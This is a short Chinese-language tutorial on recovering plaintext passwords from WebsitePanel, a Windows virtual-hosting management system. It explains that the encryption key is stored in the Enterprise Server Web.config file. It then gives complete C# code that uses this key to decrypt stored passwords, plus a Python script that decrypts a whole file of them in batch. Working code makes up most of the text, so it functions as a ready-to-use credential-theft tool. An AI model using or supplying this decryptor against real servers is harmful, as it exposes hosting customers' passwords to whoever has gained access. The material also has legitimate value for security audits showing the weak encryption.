WebsitePanel密码解密

WebsitePanel是一套Windows系统中的虚拟主机管理系统，可以同时管理多台服务器。

 

通过反编译该系统的dll发现该系统的密码加密方式可逆。

解密流程

1，获取密钥

密钥保存在  Enterprise Server\Enterprise Server\Web.config 文件中

<add key="WebsitePanel.CryptoKey" value="qgyd********a0drj" />中的value的内容即为密钥

2，替换代码中的密钥位置，保存为c#文件，编译

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

public class Hello
{
    public static void Main(string[] args)
    {
        int arg;
        //Console.WriteLine(args[0].ToString());
        string InputText = args[0].ToString();
        string cryptoKey = "<你的加密密钥>";
        RijndaelManaged rijndaelManaged = new RijndaelManaged();
        byte[] array = Convert.FromBase64String(InputText);
        byte[] bytes = Encoding.ASCII.GetBytes(cryptoKey.Length.ToString());
        PasswordDeriveBytes passwordDeriveBytes = new PasswordDeriveBytes(cryptoKey, bytes);
        ICryptoTransform transform = rijndaelManaged.CreateDecryptor(passwordDeriveBytes.GetBytes(32), passwordDeriveBytes.GetBytes(16));
        MemoryStream memoryStream = new MemoryStream(array);
        CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Read);
        byte[] array2 = new byte[array.Length];
        int count = cryptoStream.Read(array2, 0, array2.Length);
        memoryStream.Close();
        cryptoStream.Close();
        //return Encoding.Unicode.GetString(array2, 0, count);
        Console.WriteLine(Encoding.Unicode.GetString(array2, 0, count));
    }
}
   

3，编译后 decrypt.exe <password>即可解密单个密码

批量解密可把所有密码都保存到一个txt里，然后编写脚本批量解密，比如下面的python脚本

import sys
import os

decrycmd = "WebsitePanel_password_decrypto.exe {password}"
fp = open("hash.txt","r")
hash = fp.readlines()
fp.close()

passwordlist = []
for p in hash:
    p = p.strip()
    content = os.popen(decrycmd.format(password=p))
    passwordlist.append(p+" >>> "+content.read()+"\n")

fp = open("password.txt","w+")
fp.writelines(passwordlist)
fp.close()